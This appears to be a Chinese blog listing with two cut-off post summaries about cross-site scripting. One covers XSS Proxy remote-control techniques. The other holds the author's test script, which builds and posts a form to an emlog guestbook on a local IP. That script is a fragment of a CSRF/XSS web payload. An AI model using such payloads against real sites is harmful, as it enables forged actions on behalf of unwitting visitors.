摘要:
转自:http://blog.csdn.net/cnbird2008/article/details/4299544http://ha.ckers.org/xss.html关于XSS Proxy技术关于Cross Iframe Trick的思路。让我想到了曾经看到的关于XSS Proxy的一些文章。Advanced Cross-Site-Scripting with Real-time Remote Attacker Control ,精彩之处:还有一篇关于Advanced XSS attacks and XSS-Proxy 的PPT。都是05年的资料了。它的主要思想是:在有XSS漏洞(持久型 阅读全文
摘要:
参考:http://zhchx0827.iteye.com/blog/1681349下面是我测试的代码,贴出来记录一下:<script>document.write('<form name=myForm></form>'); var myForm=document.forms['myForm']; myForm.action='http://192.168.0.100/emlog/?action=guestbook'; myForm.method='POST'; var input = docu 阅读全文